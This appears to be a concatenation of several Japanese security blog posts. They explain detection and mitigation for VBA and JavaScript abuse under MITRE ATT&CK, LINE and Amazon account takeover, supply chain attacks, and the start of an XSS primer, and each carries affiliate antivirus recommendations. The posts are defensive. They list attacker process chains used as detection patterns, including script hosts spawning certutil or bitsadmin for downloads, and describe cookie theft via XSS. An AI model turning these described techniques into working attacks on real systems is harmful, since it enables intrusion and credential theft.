• ☐ グループポリシーでOfficeマクロをデフォルト無効に設定（「通知を表示せずにすべてのマクロを無効にする」）
• ☐ MOTW（Mark of the Web）によるインターネットファイルのマクロブロックを有効化
• ☐ Microsoft DefenderのASRルール「Officeアプリケーションによる子プロセス作成をブロック」を有効化
• ☐ ASRルール「Officeマクロからの Win32 API コールをブロック」を有効化
• ☐ AppLocker/WDACでwscript.exe、cscript.exe、mshta.exeの実行を制限
• ☐ AMSI対応のエンドポイント保護ソフトを導入
• ☐ メールゲートウェイでマクロ付きOffice文書（.docm、.xlsm）のフィルタリングを設定
• ☐ Sysmonを導入し、Officeプロセスからの子プロセス生成を監視
• ☐ 署名済みマクロのみ許可するポリシーを適用

おすすめセキュリティ対策ツール

VBAマクロやVBScriptベースの攻撃を検出・防御するためには、AMSI連携に対応したエンドポイント保護とメールセキュリティが重要です。

🛡️ まず今日から始めるなら：Officeマクロの無効化 + AMSI対応セキュリティソフトの導入
マクロをデフォルト無効にするだけで、VBAベースの攻撃の大部分を防げます。加えてAMSI連携のセキュリティソフトで、難読化されたマクロコードも実行時に検出可能になります。

• ESET（イーセット） — 誤検知が少なく軽量。AMSI連携でマクロ型マルウェアもリアルタイム検出
• ウイルスバスター — 日本語サポートが充実。メール添付ファイルのスキャンに強い国産セキュリティソフト
• Norton（ノートン） — 世界最大手のセキュリティベンダー。多層防御でマクロ攻撃からの保護を実現

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：Visual Basic攻撃対策の要点

• マクロを無効化する：グループポリシーでOfficeマクロをデフォルト無効に設定し、MOTW付きファイルのマクロ実行をブロックする
• 子プロセス生成を監視する：Officeアプリケーション（winword.exe、excel.exe）からpowershell.exe、cmd.exe、wscript.exeなどが起動するパターンは高い確率で攻撃活動
• AMSIで検出する：AMSI対応のセキュリティソフトにより、難読化されたVBAマクロでも実行時に検出可能
• ASRルールで攻撃面を縮小する：Microsoft Defenderの攻撃面縮小ルールで、マクロからの不審なプロセス作成やAPI呼び出しをブロック
• スクリプトホストを制限する：wscript.exe、cscript.exe、mshta.exeの実行をAppLocker/WDACで業務上必要なケースのみに制限する

参考資料：MITRE ATT&CK T1059.005 – Visual Basic / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC

Based on MITRE ATT&CK®, © The MITRE Corporation. Licensed under Apache License 2.0. 本記事は非公式の日本語解説です。

関連記事

• T1059 コマンド＆スクリプティングインタプリタとは？攻撃手法と検知方法【MITRE ATT&CK】
• T1059.001 PowerShellを悪用した攻撃手法と検知方法【MITRE ATT&CK】
• T1059.003 Windowsコマンドシェル（cmd.exe）を悪用した攻撃手法と検知方法【MITRE ATT&CK】
• T1204.002 Malicious Fileとは？MITRE ATT&CK日本語解説
• フィッシング詐欺の見分け方と対策【2026年版】
• セキュリティソフトおすすめ比較2026年版【全機能徹底検証】

The post T1059.005 Visual Basic（VBA/VBScript）を悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

JavaScriptはWebブラウザだけでなく、Windows Script Host（WSH）やNode.jsを通じてOS上でも実行可能なスクリプト言語です。MITRE ATT&CKではT1059.007 JavaScriptとして分類されており、APT32（OceanLotus）、Lazarus Group、FIN7など多数の攻撃グループによる悪用が確認されています。本記事では、JavaScriptがなぜ攻撃に悪用されるのか、実際の攻撃事例、検出方法、そして実務で使える緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

T1059.007 JavaScriptの概要

T1059.007は、T1059 Command and Scripting InterpreterのSub-techniqueであり、Execution（実行 / TA0002）タクティクスに属します。攻撃者はJavaScript（JScript）を使用して、悪意のあるコードの実行、ファイルのダウンロード、情報の窃取、C2（Command and Control）サーバーとの通信など多岐にわたる攻撃活動を行います。

Windowsでは、JavaScriptファイル（.js/.jse）はWindows Script Host（wscript.exeまたはcscript.exe）を通じて実行されます。また、Node.jsがインストールされた環境ではサーバーサイドでの実行も可能であり、攻撃者にとって柔軟な攻撃基盤となっています。

JavaScriptが攻撃に悪用される理由

• OS標準で実行可能：Windowsには標準でWindows Script Host（WSH）が搭載されており、.jsファイルをダブルクリックするだけでスクリプトが実行される
• ファイル拡張子の偽装が容易：.jsファイルはデフォルトでアイコンがスクリプトファイルに見えず、ユーザーが文書ファイルと誤認しやすい
• COMオブジェクトへのアクセス：WSH経由でWScript.ShellやScripting.FileSystemObjectなどのCOMオブジェクトを操作し、コマンド実行やファイル操作が可能
• 難読化の容易さ：文字列のエンコード、変数名の置換、eval()による動的実行など、多様な難読化手法でセキュリティ製品の検出を回避できる
• メール添付による配布：.jsファイルはZIPに圧縮してメール添付で送信でき、フィッシングメールの添付ファイルとして広く悪用されている
• ドロッパーとしての利用：JavaScriptは他のマルウェアをダウンロード・実行するドロッパー（ローダー）として頻繁に使用される

攻撃シナリオ例

APT32（OceanLotus）— JavaScriptバックドアによる持続的アクセス

ベトナム系の国家支援型グループAPT32（OceanLotus）は、JavaScriptベースのバックドアを積極的に利用することで知られています。典型的な攻撃フローは以下の通りです：

T1566（フィッシング）→ T1204（ユーザー実行）→ T1059.007（JavaScript実行）

• スピアフィッシングメールに悪意のある文書ファイルまたは.jsファイルを添付して送信
• ユーザーがファイルを開くと、難読化されたJavaScriptが実行される
• JavaScriptがWScript.Shellオブジェクトを利用してC2サーバーと通信を確立
• 追加のペイロード（DLLやシェルコード）をダウンロードし、メモリ上で実行
• レジストリやスタートアップフォルダにJavaScriptを登録し、永続化（Persistence）を確保

Lazarus Group — JavaScriptベースのローダーによる多段攻撃

北朝鮮系のLazarus Groupは、JavaScriptを初期侵入後のローダーとして利用する手法を多用しています。特に暗号通貨関連企業や金融機関を標的とした攻撃で確認されています。

• 偽の求人情報や取引提案を装ったフィッシングメールでJavaScriptファイルを配布
• .jsファイルがwscript.exeを介して実行され、第二段階のペイロードをダウンロード
• ダウンロードされたペイロードがシステム情報を収集し、C2サーバーに送信
• 標的の価値が確認された場合、さらに高度なマルウェア（RATやキーロガー）を展開

FIN7 — JScriptを用いたフィッシング攻撃

金融犯罪グループFIN7は、小売・飲食業界を標的としたフィッシング攻撃でJScript（MicrosoftによるJavaScript実装）を多用しています。FIN7の攻撃は以下のパターンで実行されます：

• 請求書や注文確認を装ったフィッシングメールに、悪意のある.docファイルを添付
• Office文書内のマクロが.jseファイル（エンコード済みJScript）を生成・実行
• JScriptがHTTPリクエストでC2サーバーからCarbanak/Anunak等のバックドアを取得
• POS（販売時点情報管理）システムからクレジットカード情報を窃取

検出方法

Windows Script Hostの実行ログ監視

Windows Script Host（WSH）によるJavaScript実行を検出するには、プロセス作成イベントの監視が最も効果的です。Sysmon（Event ID 1）またはWindowsセキュリティログ（Event ID 4688）でwscript.exeおよびcscript.exeの起動を監視します。

特に注目すべきパターン：

• wscript.exe または cscript.exe が .js / .jse ファイルを引数に取って起動
• 一時フォルダ（%TEMP%、%AppData%）からのスクリプト実行
• メールクライアント（outlook.exe）やブラウザからwscript.exeが子プロセスとして起動
• コマンドラインに //E:jscript や //B（バッチモード）パラメータが含まれる場合

子プロセスの監視（wscript.exe/cscript.exeからの派生）

悪意のあるJavaScriptは、WScript.ShellオブジェクトのRun()やExec()メソッドを通じてさらに別のプロセスを起動します。以下のような子プロセス生成パターンは高い確率で攻撃活動を示します：

• wscript.exe → powershell.exe：JavaScriptからPowerShellへの連鎖実行
• wscript.exe → cmd.exe：コマンドプロンプトの起動
• wscript.exe → mshta.exe：HTA（HTML Application）の起動
• wscript.exe → certutil.exe / bitsadmin.exe：ファイルのダウンロード
• wscript.exe → regsvr32.exe：DLLの登録・実行

スクリプトファイルの作成・変更の監視

Sysmon Event ID 11（FileCreate）を使用して、.js / .jse / .wsf ファイルの作成を監視します。特に以下のディレクトリへのスクリプトファイル作成は要注意です：

• %TEMP% および %AppData%：一時ファイルとして作成される悪意のあるスクリプト
• %USERPROFILE%\Downloads：ダウンロードされたスクリプト
• スタートアップフォルダ：永続化のために配置されたスクリプト
• %ProgramData%：マルウェアが使用する共通の隠蔽場所

緩和策（Mitigations）

実装チェックリスト

• ☐ Windows Script Host（WSH）が不要な端末では無効化する
• ☐ .js / .jse ファイルの既定の関連付けをメモ帳等のテキストエディタに変更
• ☐ AppLockerまたはWDACでwscript.exe/cscript.exeの実行を制限
• ☐ Sysmon を導入し、プロセス作成（Event ID 1）とファイル作成（Event ID 11）を監視
• ☐ ASRルール「Office アプリケーションによる子プロセスの作成をブロック」を有効化
• ☐ メールゲートウェイで.js / .jse / .wsfファイルの添付をブロック
• ☐ AMSI対応のエンドポイント保護ソフトを導入

おすすめセキュリティ対策ツール

JavaScriptベースの攻撃を検出・防御するためには、スクリプト実行のリアルタイム監視に対応したエンドポイント保護が重要です。

🛡️ まず今日から始めるなら：.jsファイルの既定の関連付け変更とセキュリティソフトの導入
JavaScriptファイルの既定のプログラムをテキストエディタに変更するだけで、うっかりダブルクリックしても即座に実行されるリスクを排除できます。さらにAMSI対応のセキュリティソフトで多層防御を実現しましょう。

• ESET（イーセット） — 誤検知が少なく軽量。スクリプトベースの攻撃検出に優れたヒューリスティックエンジン搭載
• ウイルスバスター — 日本語サポートが充実。Webレピュテーション機能でC2通信もブロック
• Norton（ノートン） — 世界最大手のセキュリティベンダー。SONAR技術による振る舞い検知でゼロデイ攻撃にも対応

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：JavaScript攻撃対策の要点

• WSHを無効化する：業務でWindows Script Hostを使用していなければ即座に無効化する。これだけで.jsファイルによる攻撃の大部分を防止できる
• ファイルの関連付けを変更する：.js / .jseファイルの既定のプログラムをテキストエディタに変更し、誤実行を防止する
• プロセスの親子関係を監視する：wscript.exe/cscript.exeからpowershell.exeやcmd.exeが起動するパターンは高い確率で攻撃活動
• メールゲートウェイで遮断する：.js / .jse / .wsfファイルの添付をメールゲートウェイでブロックし、入口対策を強化する

参考資料：MITRE ATT&CK T1059.007 – JavaScript / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC

Based on MITRE ATT&CK®, © The MITRE Corporation. Licensed under Apache License 2.0. 本記事は非公式の日本語解説です。

関連記事

• フィッシング詐欺の見分け方と対策【2026年版】
• セキュリティソフトおすすめ比較2026年版【全機能徹底検証】

The post T1059.007 JavaScriptを悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

LINE乗っ取りとは？主な手口

① フィッシング詐欺

「LINEセキュリティ確認のため認証番号を教えてください」「アカウントが危険な状態です」などと偽ったメッセージを送り、認証コードを騙し取る手口です。LINE公式を装ったフィッシングサイトへ誘導するケースも多発しています。

② 認証番号の詐取

機種変更・端末追加時にSMSで届く「認証番号（6桁）」を、友人・知人を装ったアカウントから「間違えて送ってしまったので教えて」などと騙し取る手口です。この番号を渡すと即座にアカウントが乗っ取られます。

③ パスワード使い回しによる不正ログイン

他のサービスで漏洩したメールアドレス＋パスワードの組み合わせをLINEに試す「リスト型攻撃（パスワードスプレー攻撃）」です。LINEとYahoo!のパスワードを同じにしていた場合、Yahoo!が漏洩するとLINEも危険になります。

④ 公共PCやスマホの使い回し

共用PCや他人のスマートフォンでLINEにログインし、ログアウトし忘れたまま放置することで、第三者にアカウントが使われるケースです。

LINE乗っ取りの確認方法

サインイン中の端末を確認する

LINE乗っ取りを確認する最も確実な方法は、現在どの端末でサインインされているかを確認することです。

1. LINEを開く
2. 右下の「ホーム」タブをタップ
3. 右上の歯車アイコン（設定）をタップ
4. 「アカウント」をタップ
5. 「ログイン中の端末を確認」をタップ

ここに見覚えのない端末・ログイン履歴があれば、乗っ取られている可能性が高いです。

LINE乗っ取りの主なサイン

• 友人・知人から「あなたのLINEからおかしなメッセージが届いた」と連絡が来た
• 自分では送っていないメッセージが送信済みになっている
• LINEのパスワード変更メール・認証コードが届いた（自分では操作していない）
• 突然LINEからログアウトされた
• プロフィール写真・名前が勝手に変更されている

LINE乗っ取りが疑われた場合の即時対処法

Step 1：パスワードを即座に変更する

設定 → アカウント → パスワード変更。現在ログインできる場合は直ちに変更します。新しいパスワードは12文字以上・英大文字小文字数字記号の組み合わせにしましょう。

Step 2：全ての端末からログアウトする

設定 → アカウント → ログイン中の端末を確認 → 不審な端末を「ログアウト」させます。「全ての端末からログアウト」機能を使うと、自分の端末を含む全端末からサインアウトできます。

Step 3：二段階認証（PIN）を設定する

設定 → アカウント → 二段階認証。6桁のPINコードを設定します。新しい端末でログインする際にPINコードの入力が必要になり、不正ログインを大幅に防げます。

Step 4：友人・知人への通知

乗っ取られた間に友人へのなりすましメッセージが送られている可能性があります。グループや個別のトークで「LINEが乗っ取られていました。不審なメッセージは無視してください」と周知しましょう。

Step 5：ログインできない場合はLINEサポートへ

パスワードを変更されてログインできなくなった場合は、LINEサポートセンターに問い合わせます。登録した電話番号・メールアドレスで本人確認を行い、アカウントを取り戻す手続きができます。

LINE乗っ取り完全防止設定5選

① 二段階認証（PIN）の設定

設定 → アカウント → 二段階認証をオンにする。新端末でのログイン時にPINコード（6桁）の入力が必要になります。最も効果的な乗っ取り防止策です。

② メールアドレス登録

設定 → アカウント → メールアドレス登録。メールアドレスとパスワードでログインできるようになり、乗っ取り時の復旧が容易になります。

③ 「他端末でのログインを許可」をオフ

設定 → アカウント → 「他の端末にもログインを許可」をオフ。自分のスマートフォン1台のみでLINEを使用している場合は、オフにすることで不正な多端末ログインを防げます。

④ 認証番号・確認コードは絶対に教えない

SMSやLINEで届く「認証番号」「確認コード」は、たとえ友人・LINE公式・家族を名乗る相手でも絶対に教えてはいけません。これを教えた瞬間、アカウントが乗っ取られます。LINE公式が認証番号を聞くことは絶対にありません。

⑤ LINEのパスワードを他サービスと使い回さない

LINEのパスワードは他のサービスと必ず別のものにしましょう。パスワードマネージャー（Bitwarden等）を使えば、サービスごとに異なる強力なパスワードを管理できます。

LINE乗っ取りに使われたケースと被害

LINE乗っ取りアカウントは以下のような犯罪に悪用されます。

関連記事

• フィッシング詐欺の見分け方と対策【2026年版】：LINE詐欺・なりすましフィッシングの見分け方
• Amazonアカウント不正ログインの対処法：SNS・ECサイト全般のアカウント乗っ取り対策
• iPhoneのウイルス確認・感染チェック方法と対処法：LINEアプリのある端末のセキュリティチェック方法
• オンラインバンキングを守る7つの鉄則【2026年版】：LINE Pay・LINEと連携した金融サービスの保護対策

おすすめセキュリティ対策ツール

LINE乗っ取り対策と合わせて、フィッシング詐欺対策としてセキュリティソフトの導入も効果的です。

🛡️ まず今日から始めるなら：セキュリティソフトでフィッシング対策を強化
LINE乗っ取りに使われるフィッシングサイトへのアクセスを自動検知・ブロックするセキュリティソフトを導入しましょう。

• — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• — 日本語サポートが充実。フィッシング詐欺ブロック機能搭載
• — 世界最大手のセキュリティベンダー。詐欺サイト対策に定評

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：LINE乗っ取り対策の要点

• ✅ 二段階認証（PIN）を今すぐ設定する（最重要）
• ✅ 認証番号・確認コードは誰にも絶対に教えない
• ✅ 定期的にログイン中の端末を確認する
• ✅ LINEパスワードは他サービスと別のものを使用する
• ✅ 乗っ取られたらパスワード変更→全端末ログアウト→友人への周知を即実施

LINE乗っ取りは「自分には関係ない」と思っていた方が被害に遭うケースが後を絶ちません。今すぐ二段階認証の設定だけでも完了させて、アカウントを守りましょう。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ LINE乗っ取り防止に最も有効：セキュリティソフトでフィッシングをブロック

• ESET（イーセット） — 誤検知が少なく軽量。中小企業・個人に人気のコスパ重視セキュリティソフト
• ウイルスバスター — 日本語サポートが充実。フィッシング対策・ダークウェブ監視・ウイルス除去を一体管理
• Norton 360 — 世界最大手のセキュリティベンダー。VPN機能・パスワードマネージャー付きの総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

参考資料：SNSのセキュリティ対策（IPA） / 内閣サイバーセキュリティセンター（NISC）

関連記事：フィッシングURL判定ツール【無料】 / パスワード強度チェッカー【無料ツール】

※本記事にはアフィリエイトリンクが含まれます。詳しくは広告掲載についてをご覧ください。

The post LINE乗っ取りの確認方法と対処法【今すぐできる完全防止設定5選】 appeared first on AI Security Review.

不正ログインに気づいたらまず5分以内にやること

時間との戦いです。不正ログインを疑った瞬間から以下を即実行してください。

1. Amazonにログインしてパスワードを即変更（アカウント → ログインとセキュリティ → パスワード変更）
2. 登録メールアドレスが変更されていないか確認（変更されていれば攻撃者に乗っ取られている可能性大）
3. 注文履歴を確認——身に覚えのない注文があれば即キャンセル＆カード会社に連絡
4. 登録クレジットカードの不正請求を確認——カード会社の24時間窓口に電話
5. 二段階認証を有効化（まだの場合は今すぐ設定）

Amazonアカウント不正ログインの原因3パターン

① 他サービスからのパスワード流出（最多）

Amazonと同じパスワードを別サービスでも使い回していた場合、そのサービスが情報漏洩した際にAmazonも標的になります。「クレデンシャルスタッフィング」と呼ばれる攻撃で、流出したID・パスワードの組み合わせを自動的に試すため、何千・何万もの組み合わせが短時間で試されます。

② フィッシング詐欺でパスワードを騙し取られた

「Amazon【重要】お支払い方法の確認」「Amazonアカウントが一時停止されました」といった偽メール・偽SMSに誘導されて、偽のAmazonログインページでパスワードを入力してしまうケース。IPA 情報セキュリティ10大脅威2026でもフィッシングは上位に挙げられています。

③ マルウェア・キーロガーによる盗取

PCやスマートフォンにマルウェアが感染していると、キーボード入力を記録するキーロガーやスパイウェアによってパスワードが盗まれます。セキュリティソフトが未導入または定義ファイルが古い場合に発生しやすいです。

【完全版】Amazonアカウント不正ログイン対処手順

Amazonアカウントの二段階認証設定方法（図解）

1. Amazon.co.jpにログイン → 右上の「アカウント＆リスト」
2. 「アカウントサービス」→「ログインとセキュリティ」
3. 「二段階認証（2SV）の設定」→「開始する」
4. 認証方法を選択：認証アプリ（Google Authenticator等）が最も安全。SMS認証より推奨
5. QRコードをスキャンして6桁コードを入力→完了

二段階認証を設定すると、パスワードが盗まれても第三者はログインできません。設定は5分もかかりません。今すぐ実施してください。

不正ログイン後に確認すべき5つのポイント

• ギフト券の購入履歴：不正利用者はギフト券を大量購入することが多い
• お届け先住所の追加：不審な住所が追加されていないか確認
• Prime会員の登録状況：意図しないPrime登録・継続がされていないか
• Kindleの購入履歴：デジタルコンテンツの不正購入
• Amazon Payの利用履歴：外部サービスへの不正決済がないか確認

再発防止のための4つの対策

1. パスワードの使い回しをやめる：パスワードマネージャー（1Password・Bitwarden等）で各サービス固有の強力なパスワードを管理
2. 二段階認証は認証アプリで設定：SMS認証はSIMスワッピング攻撃に弱いため認証アプリ推奨
3. Amazonからのメールは本物か確認する習慣：リンクをクリックせず公式アプリ・ブックマークからアクセス
4. セキュリティソフトを導入する：フィッシングサイトをブロックし、マルウェア感染を防止

Amazonアカウント不正ログインの実態データ【2026年版】

Amazon不正ログインの規模を理解することは、対策の重要性を認識する第一歩です。IPA（情報処理推進機構）の「情報セキュリティ10大脅威2026」では、クレデンシャルスタッフィング攻撃（パスワード使い回しを狙った自動ログイン試行）が引き続き上位にランクインしています。

Amazonは不正アクセスを検知した場合、登録メールアドレスへ「Amazonにサインインがありました」という通知を送ります。このメールが届いたが身に覚えがない場合は、直ちにパスワード変更と二段階認証の設定を行ってください。なお、Amazonの公式セキュリティ通知は必ず @amazon.co.jp ドメインから送信されます。

Amazonセキュリティ設定チェックリスト

よくある質問（FAQ）

Q. 「Amazonにサインインがありました」というメールが届いたが身に覚えがない

A. すぐにパスワードを変更し、二段階認証を設定してください。不審な注文・クレジットカード請求を確認し、問題があればAmazonカスタマーサービス（0120-899-543）に連絡します。

Q. 不正注文が発送済みでキャンセルできない場合は？

A. 商品到着後に「商品を受け取っていない」として返品申請をしてください。Amazonカスタマーサービスに不正利用として申告すると返金対応してもらえるケースが多いです。被害額が大きい場合は警察への被害届提出とIPA安心相談窓口への相談もご検討ください。

Q. 二段階認証を設定するとSMSとアプリどちらがより安全？

A. 認証アプリ（Google AuthenticatorやAuthyなど）の方がより安全です。SMS認証はSIMスワッピング攻撃（電話番号の乗っ取り）に弱いため、セキュリティを重視するなら認証アプリを選択してください。

まとめ：不正ログイン対応は「速度」と「再発防止」の2本柱

Amazonアカウントの不正ログインは、パスワード変更・二段階認証設定・被害確認を速やかに行うことで被害を最小化できます。根本原因はパスワードの使い回しとフィッシングが大半。パスワードマネージャーとセキュリティソフトの導入で、再発リスクを大幅に下げることができます。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ Amazonアカウント保護を強化：フィッシング対策・ダークウェブ監視付きソフト

• ESET（イーセット） — 誤検知が少なく軽量。中小企業・個人に人気のコスパ重視セキュリティソフト
• ウイルスバスター — 日本語サポートが充実。フィッシング対策・ダークウェブ監視・ウイルス除去を一体管理
• Norton 360 — 世界最大手のセキュリティベンダー。VPN機能・パスワードマネージャー付きの総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

※本記事にはアフィリエイトリンクが含まれます。詳しくは広告掲載についてをご覧ください。

関連記事

• フィッシング詐欺の見分け方と対策【2026年版】：Amazon詐欺メール・フィッシングサイトの見分け方
• セキュリティソフトおすすめ比較2026年版：Amazonアカウント保護に役立つセキュリティソフト選び
• セキュリティソフト選び方5つのポイント【2026年】：アカウント乗っ取り被害を最小化するソフトの選定基準
• オンラインバンキングを守る7つの鉄則【2026年版】：Amazonと連携した銀行・カード情報を守る鉄則
• LINE乗っ取りの確認方法と対処法：SNS・ECサイトアカウント乗っ取りへの包括的対策

The post Amazonアカウント不正ログインの対処法【今すぐやること5ステップ】 appeared first on AI Security Review.

【PR開示】本記事にはアフィリエイトリンクが含まれる場合があります。

2020年末に発覚したSolarWinds事件は、サイバーセキュリティの世界に衝撃を与えました。米国政府機関・Fortune 500企業など18,000社以上が利用するITモニタリングソフトのアップデートに悪意あるコードが混入され、ロシア対外情報庁（SVR）と見られる攻撃者が数ヶ月にわたって侵入を続けていたのです。この事件はソフトウェアのサプライチェーンそのものを攻撃するという新たな脅威を世界に知らしめました。2026年現在も、オープンソースライブラリへのバックドア混入・CI/CDパイプラインの改ざん・サードパーティSaaSの侵害を通じたサプライチェーン攻撃は増加し続けています。

サプライチェーン攻撃とは何か

サプライチェーン攻撃とは、直接的なターゲットを狙うのではなく、ターゲットが信頼しているソフトウェアのサプライチェーン（開発・配布・更新の経路）を侵害することで間接的に攻撃する手法です。正規のアップデートや信頼済みのライブラリを経由するため、従来のウイルス対策・ファイアウォールでは検知が極めて困難です。

代表的なサプライチェーン攻撃事例

SolarWinds SUNBURST（2020年）

SolarWindsのITモニタリング製品「Orion」のビルドシステムに侵入した攻撃者は、正規のアップデートパッケージにバックドア（SUNBURST）を混入させました。デジタル署名付きの正規アップデートとして配布されたため、セキュリティソフトでは検知できませんでした。米国財務省・国土安全保障省・マイクロソフトなどが被害を受け、被害総額は数兆円規模と推定されています。

Log4Shell（CVE-2021-44228）

Apache Log4j 2というJava製ロギングライブラリの脆弱性で、世界中のJavaアプリケーションに影響しました。Log4jは無数のサードパーティソフトウェア・クラウドサービスの依存ライブラリとして使われていたため、自社で直接利用していなくても間接的に脆弱なケースが多発しました。これは「依存ライブラリの依存ライブラリ（推移的依存関係）」に潜む脆弱性の典型例です。

XZ Utils バックドア（CVE-2024-3094）

2024年に発覚したXZ Utilsへのバックドア混入は、オープンソースコミュニティに衝撃を与えました。攻撃者は約2年間かけてXZ Utilsのメンテナーとして信頼を積み上げ、最終的にSSHサーバへの不正アクセスを可能にするバックドアをコードに混入しました。この事件は、OSS（オープンソースソフトウェア）のメンテナー自体を長期的に狙う「ロングゲーム型」の高度な攻撃手口を示しています。

npmパッケージへの悪意あるコード混入

JavaScriptのパッケージレジストリ（npm）では、人気パッケージに似た名前の偽パッケージ（タイポスクワッティング）や、乗っ取ったパッケージへのマルウェア混入事件が相次いでいます。2022年の「node-ipc」事件では、人気パッケージのメンテナーが意図的に破壊的コードを混入し、ロシア・ベラルーシのIPからアクセスされた端末のファイルを削除しました。

企業向けサプライチェーン攻撃対策

対策1: SBOM（ソフトウェア部品表）の導入

SBOM（Software Bill of Materials：ソフトウェア部品表）とは、ソフトウェアが使用しているすべての構成要素（ライブラリ・フレームワーク・依存関係）を一覧化した文書です。米国大統領令14028（2021年）でも連邦政府調達ソフトウェアへのSBOM提供が義務付けられました。SBOMを整備することで、新たな脆弱性（CVE）が公開された際に自社製品への影響を迅速に特定できます。CycloneDX・SPDX形式が標準として普及しています。

対策2: 依存ライブラリの継続的な脆弱性スキャン

直接利用しているライブラリだけでなく、推移的依存関係（依存の依存）まで含めた脆弱性スキャンが不可欠です。GitHub Dependabot・Snyk・OWASP Dependency-Check・npm auditなどのツールをCI/CDパイプラインに組み込み、新たなCVEが公開されるたびに自動で検知・通知する体制を整えます。また、依存ライブラリのバージョンを固定（lockファイル）し、予期しない更新によるリスクを防ぎます。

対策3: CI/CDパイプラインのセキュリティ強化

ビルド・テスト・デプロイの自動化パイプライン（CI/CD）が侵害されると、SolarWindsと同様に正規のリリース物にバックドアが混入するリスクがあります。対策として、シークレット管理（ハードコード禁止・GitHub Secret Scanning有効化）・ビルド環境の分離（Dockerコンテナ等）・アーティファクトの署名（Sigstore/cosign）・SLSA（Supply chain Levels for Software Artifacts）フレームワークの適用が推奨されます。

対策4: ベンダーリスク管理（TPRM）

自社が利用するSaaS・クラウドサービス・委託開発ベンダーのセキュリティ態勢を評価するTPRM（Third-Party Risk Management）の整備が重要です。主要ベンダーには定期的なセキュリティ質問票（SIG・VSAQなど）の回答依頼・SOC 2 Type IIレポートの取得確認・ペネトレーションテスト結果の共有を求めます。また、契約にセキュリティインシデント発生時の通知義務（24時間以内など）を盛り込むことが重要です。

対策5: 最小権限とネットワーク分離

サプライチェーン経由でバックドアが侵入した場合に備え、被害を最小化するための事後対策も重要です。サードパーティソフトウェアには必要最小限の権限のみ付与し（最小権限の原則）、ネットワークセグメンテーションで重要システムへのアクセスを制限します。EDR・SIEMによる挙動監視で、正規ソフトウェアが不審な通信を行った際に迅速に検知・遮断できる体制を整えます。

対策6: OSS利用の管理とコードレビュー強化

• 信頼できるソースからのみ取得: 公式レジストリ（PyPI・npm・Maven Central）からのみ取得し、ミラーサイトや非公式ソースを避ける
• ダウンロード数・メンテナンス状況の確認: ダウンロード数が少ない・長期間更新なし・メンテナーが少ないパッケージはリスクが高い
• パッケージ整合性の検証: ハッシュ値・デジタル署名を確認してダウンロードしたパッケージの改ざんを検知する
• 内部プロキシレジストリの活用: Nexus Repository・JFrog Artifactoryで承認済みパッケージのみ利用可能にする

おすすめセキュリティ対策ツール

サプライチェーン対策と並行して、エンドポイント保護によるマルウェア検知も多層防御の重要な要素です。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
サプライチェーン経由で侵入したバックドアの挙動をEDR機能で検知するためにも、エンドポイント保護は多層防御の基盤となります。

• — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• — 日本語サポートが充実。国産ソフトで中小企業導入実績多数
• — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策

まとめ：信頼の連鎖を守るために

• サプライチェーン攻撃は正規のソフトウェア配布経路を悪用するため従来の防御手段では検知困難
• SolarWinds・Log4Shell・XZ Utilsの事例は「信頼済みのソフトウェアでも安全とは限らない」ことを示した
• SBOM整備・依存ライブラリの自動スキャン・CI/CDセキュリティ・TPRM・最小権限の5つが対策の柱
• OSSの利用管理（信頼できるレジストリ・整合性検証・内部プロキシ）でリスクを大幅に低減できる
• 事後対策として挙動監視（EDR・SIEM）を組み合わせることで侵入時の被害を最小化できる

サプライチェーン攻撃への対策は「自社だけのセキュリティ強化」では不十分です。利用するすべてのソフトウェア・サービス・ベンダーをセキュリティの観点で継続的に評価・監視する体制が現代のセキュリティに求められています。

関連記事: ゼロトラストアーキテクチャとは？2026年版導入ガイド / APIセキュリティ入門: OWASP API Top 10と対策【2026年版】

参考資料: CISA: ICT サプライチェーンリスク管理 / IPA 情報セキュリティ10大脅威 2026 / SLSA Framework（ソフトウェアアーティファクトのサプライチェーンセキュリティ）

The post サプライチェーン攻撃と対策【2026年版】 appeared first on AI Security Review.

「自社のWebサイトが改ざんされた」「ユーザーのセッション情報が盗まれた」——そんな被害の背後に潜む脆弱性の一つが、XSS（クロスサイトスクリプティング）です。IPAの「情報セキュリティ10大脅威 2026」でもWebアプリ脆弱性攻撃が引き続き上位にランクインしており、XSSはSQLインジェクションと並んで最も報告件数が多い脆弱性です。本記事では、XSSの仕組みから最新の攻撃手口、そして企業が今すぐ実施すべき対策まで、エンジニアと非エンジニア双方が理解できるように解説します。

XSS（クロスサイトスクリプティング）とは何か

XSSとは、攻撃者が悪意あるスクリプト（主にJavaScript）をWebページに埋め込み、そのページを閲覧したユーザーのブラウザ上でスクリプトを実行させる攻撃手法です。「クロスサイト（Cross-Site）」という名称は、攻撃者が第三者のサイトを踏み台にする旧来の手口に由来しており、現在は同一サイト内での攻撃が主流ですが、名称がそのまま定着しています。

XSS攻撃が成立する根本原因は、ユーザー入力をそのままHTMLとして出力する処理にあります。検索フォームやコメント欄など、入力値をそのままページに表示する箇所が存在する場合、攻撃者はそこに`<script>`タグを含む文字列を送り込むことができます。

XSSで実現される主な攻撃内容

• セッションハイジャック：`document.cookie`を外部サーバーに送信し、ログイン済みユーザーになりすます
• フィッシングページへのリダイレクト：正規サイト上に偽ログイン画面を表示して認証情報を窃取
• マルウェア配布：Drive-by Download攻撃でユーザー端末にマルウェアをインストール
• Webサイト改ざん：ページ内容を書き換えてブランドイメージを毀損
• キーロガー設置：入力フォームに対してキー入力を記録・送信

